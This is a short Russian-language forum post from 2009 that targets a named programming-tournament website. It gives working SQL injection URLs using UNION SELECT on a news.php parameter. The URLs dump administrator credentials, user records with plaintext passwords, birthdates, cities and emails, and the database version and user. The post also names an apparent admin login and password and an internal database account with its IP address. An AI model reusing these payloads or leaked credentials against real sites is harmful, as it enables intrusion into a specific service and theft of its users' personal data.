Показать сообщение отдельно

  #1  
Старый 23.01.2009, 21:20
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами: 9133681

Репутация: 90
По умолчанию

Сайт турнира по программированию=) http://www.icl.ru
Цитата:
http://www.icl.ru/turnir/news.php?newsid=999+union+select+concat_ws(0x3a,pa ssword,username,login),2,3+from+contest.admins+lim it+2,1--
админка - pass:wordplay login: pupucya
пароли админов зашифрованы в MYSQL-4.x-Hash
вывод информации с пользователями:
Цитата:
http://www.icl.ru/turnir/news.php?newsid=999+union+select+concat_ws(0x3a,ni ckname,login,password,name,birthdate,city,email,cl ass),2,3+from+contest.user+limit+1,1--
пароли пользователей в незашифрованном виде ;-)
бд- turnir;
версия бд - 5.0.15-nt
юзер - contest@212.22.71.22
Цитата:
http://www.icl.ru/turnir/news.php?newsid=999+union+select+concat_ws(0x3a,ve rsion(),database(),user()),2,3--
 
Ответить с цитированием